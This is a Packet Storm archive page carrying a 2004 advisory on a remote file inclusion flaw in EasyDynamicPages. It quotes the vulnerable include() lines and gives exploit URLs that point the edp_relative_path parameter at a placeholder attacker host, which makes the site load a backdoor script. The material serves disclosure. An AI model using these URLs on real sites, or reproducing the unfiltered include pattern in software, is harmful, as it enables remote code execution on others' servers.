what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

easydynamic.txt

easydynamic.txt
Posted Jan 5, 2004
Authored by Vietnamese Security Group | Site security.com.vn

EasyDynamicPages versions 2 through 2.5 are susceptible to an include() vulnerability due to a lack of filtering that in turn allows a remote attacker to load data from remote or local resources.

tags | exploit, remote, local
SHA-256 | 573ff51946ae70b19c2e15246db337391dc59044f59265d77a23c656456a213b

easydynamic.txt

Change Mirror Download
Producr:EasyDynamicPages v.2.0: Advanced Portal Management System 
Vendors:http://software.stoitsov.com
Bug :include()
Risk:Cao
Author:tsbeginnervn(c)
Web : www.security.com.vn

-------------------------------------
Introduction :
system, personal or business site or what you need.

The goal is to have an automated web site not only to distribute news and items with automated system but also easily to create and edit dynamic web pages (DynamicPages) without knowledge of html, php or whether you need to develop websites.

Each user can submit news, comments, discuss articles and more. Registered users and administrators can additionally create and modify DynamicPages.

Plugins included with the install are BookMarks manager, E-Publish, E-card and E-gallery systems and Yahoo-like E-Classifier system.

Features: design/content separation, web admin, user-customizable theme management, SiteConfig manager, PageEdit manager, Search engine, Left-Right blocks system, editor to add news and for content management, modular DynamicalPages structure, system self install and more.

Written in PHP, works on windows, unix, linux and requires PHP, Apache and MySQL.


Vuln in files:
/admin/config.php va /dynamicpages/fast/config_page.php
==================

The Code in File /admin/config.php :

++++++++++++++++++++++++
include_once $edp_relative_path."admin/serverdata.php";
++++++++++++++++++++++++


Exploit:
http://victim/admin/config.php/edp_relative_path=http://attacker/
Voi host cua attacker:
http://attacker/admin/serverdata.php

The code in File /dynamicpages/fast/config_page.php :

++++++++++++++++++++++++
$ResultHtml="";
if ($do=="add_page") {
switch($du) {
case "site": include_once $edp_relative_path."admin/site_settings.php"; break;
case "dpage": include_once $edp_relative_path."admin/dpage_settings.php"; break;
++++++++++++++++++++++++

Exploit:
http://victim/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://attacker/

If a attacker have Script backdoor in URL :
http://attacker/admin/site_settings.php

Then acttacker exploit :

http://victim/dynamicpages/fast/config_page.php?do=add_page&du=dpage&edp_relative_path=http://attacker/


====================================================================

tsbeginnervn - BugSearch
www.security.com.vn
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close